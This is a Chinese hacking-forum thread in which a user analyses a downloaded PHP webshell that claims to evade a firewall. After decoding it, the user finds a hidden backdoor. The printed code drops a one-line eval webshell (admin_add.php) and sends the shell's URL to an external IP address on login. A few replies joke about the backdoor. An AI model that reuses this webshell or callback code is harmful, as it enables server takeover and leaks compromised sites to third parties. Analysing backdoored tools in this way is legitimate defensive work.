查看: 12641|回复: 3

这难道是传说中的后门?

[复制链接]
  • TA的每日心情
    无聊
    2015-11-10 08:58
  • 签到天数: 12 天

    [LV.3]偶尔看看II

    发表于 2014-7-9 22:13:02 | 显示全部楼层 |阅读模式
    http://www.ihonker.org/thread-3338-1-1.html

    看了这个帖子很有兴趣的下载下来,还没测试,居然传说是过狗的,,俺就先看看代码是怎么实现过狗的,base64不多说 解密。

    挖了个擦、


    if($_GET['url']=='admin')
    {
        fputs(fopen('admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');
    }
    fputs(fopen('admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');
    if($pass) {
            if ($action == 'login') {
                    if ($pass == encode_pass($password)) {
                $url=$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
            file_get_contents('http://199.193.66.146/get.php?url='.$url);
                            scookie('loginpass',encode_pass($password));
                            @header('Location: '.$self);


    由于本屌还是小学生,不懂这些,就研究了一下。<?php eval($_GET["looksb"]);?>');   这个不是传说中的一句话嘛?

    这个名为过狗大马的php马,为什么还有一句话呢? 或许是多功能吧,一句话+大马。
    本屌丝看不懂。
    继续向下看。
    http://199.193.66.146/get.php?url='.$url    我类个去。这据代码是啥我不多说了

    居然把url get到这个地址、奶奶个球的、访问了一下这个地址
    http://199.193.66.146/get.php
    需要提交参数。回头俺上burp给你传送点shell拿着玩。
    http://199.193.66.146



    Access forbidden!

    You don't have permission to access the requested directory. There is either no index document or the directory is read-protected.

    If you think this is a server error, please contact the webmaster.
    Error 403
    199.193.66.146
    Apache/2.4.4 (Win32) OpenSSL/0.9.8y PHP/5.4.16


    提示按没权限。好吧。

    admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');


    admin_add.php  尼玛这么吊。没看到过这么吊的后门、

    反正本屌不知道这是不是后门。以上内容是俺瞎猜的,大牛可别打俺。俺是新来的。

    来个图吧

    QQ图片20140709215648.jpg


    不说了,说多有人打俺。
    http://199.193.66.146/get.php?url='.$url
    既然这么 喜欢收集 好吧。俺去用burp给你get点url


    浪费了俺1JJ  还给俺
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-7-10 09:03:57 | 显示全部楼层
    高端大气上档次的免杀shell。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-7-6 16:30
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-7-11 14:08:48 | 显示全部楼层
    我的后门被你发现了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-1-5 01:07
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2014-8-3 14:12:44 | 显示全部楼层
         是的   就是传说中的后门  
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-26 01:15 , Processed in 0.028920 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部